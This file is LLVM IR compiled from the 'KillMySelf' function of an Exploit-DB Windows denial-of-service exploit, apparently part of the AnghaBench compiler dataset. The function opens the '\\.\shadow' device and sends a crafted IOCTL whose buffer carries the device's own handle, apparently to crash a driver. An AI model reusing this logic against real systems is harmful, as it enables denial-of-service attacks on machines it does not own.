; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_28001.c_KillMySelf.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_28001.c_KillMySelf.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [11 x i8] c"\\\\.\\shadow\00", align 1
@FILE_EXECUTE = common dso_local global i32 0, align 4
@FILE_SHARE_READ = common dso_local global i32 0, align 4
@FILE_SHARE_WRITE = common dso_local global i32 0, align 4
@OPEN_EXISTING = common dso_local global i32 0, align 4
@INVALID_HANDLE_VALUE = common dso_local global i64 0, align 8
@MAGIC_IOCTL = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @KillMySelf() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i64, align 8
  %3 = alloca i64*, align 8
  %4 = alloca i64*, align 8
  %5 = alloca i32, align 4
  %6 = alloca i64, align 8
  %7 = alloca i64, align 8
  %8 = load i32, i32* @FILE_EXECUTE, align 4
  %9 = load i32, i32* @FILE_SHARE_READ, align 4
  %10 = load i32, i32* @FILE_SHARE_WRITE, align 4
  %11 = or i32 %9, %10
  %12 = load i32, i32* @OPEN_EXISTING, align 4
  %13 = call i64 @CreateFile(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str, i64 0, i64 0), i32 %8, i32 %11, i32* null, i32 %12, i32 0, i32* null)
  store i64 %13, i64* %6, align 8
  %14 = load i64, i64* %6, align 8
  %15 = load i64, i64* @INVALID_HANDLE_VALUE, align 8
  %16 = icmp eq i64 %14, %15
  br i1 %16, label %17, label %19

17:                                               ; preds = %0
  %18 = call i32 (...) @ShowError()
  br label %19

19:                                               ; preds = %17, %0
  %20 = call i64 @malloc(i32 24)
  %21 = inttoptr i64 %20 to i64*
  store i64* %21, i64** %3, align 8
  %22 = load i64*, i64** %3, align 8
  %23 = icmp ne i64* %22, null
  br i1 %23, label %26, label %24

24:                                               ; preds = %19
  %25 = call i32 (...) @ShowError()
  br label %26

26:                                               ; preds = %24, %19
  %27 = load i64, i64* %6, align 8
  %28 = load i64*, i64** %3, align 8
  %29 = getelementptr inbounds i64, i64* %28, i64 3
  store i64 %27, i64* %29, align 8
  %30 = load i64, i64* %6, align 8
  %31 = load i32, i32* @MAGIC_IOCTL, align 4
  %32 = load i64*, i64** %3, align 8
  %33 = call i32 @DeviceIoControl(i64 %30, i32 %31, i32 0, i32 0, i64* %32, i32 24, i64* %2, i32 0)
  %34 = load i32, i32* %1, align 4
  ret i32 %34
}

declare dso_local i64 @CreateFile(i8*, i32, i32, i32*, i32, i32, i32*) #1

declare dso_local i32 @ShowError(...) #1

declare dso_local i64 @malloc(i32) #1

declare dso_local i32 @DeviceIoControl(i64, i32, i32, i32, i64*, i32, i64*, i32) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
